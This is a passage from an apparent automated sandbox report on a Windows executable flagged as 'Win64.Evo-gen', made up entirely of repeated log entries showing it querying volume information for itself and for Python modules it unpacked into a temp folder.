            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\_overlapped.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\multidict VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\multidict VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\multidict VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\multidict\_multidict.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\multidict VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\_hashlib.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\unicodedata.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\yarl VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\yarl VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\yarl VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\yarl\_quoting_c.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_helpers.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_http_writer.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_http_parser.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_websocket.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\_uuid.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\frozenlist VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\frozenlist VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\frozenlist VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\frozenlist\_frozenlist.cp311-win_amd64.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography\hazmat\bindings VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography\hazmat\bindings VolumeInformationJump to behavior
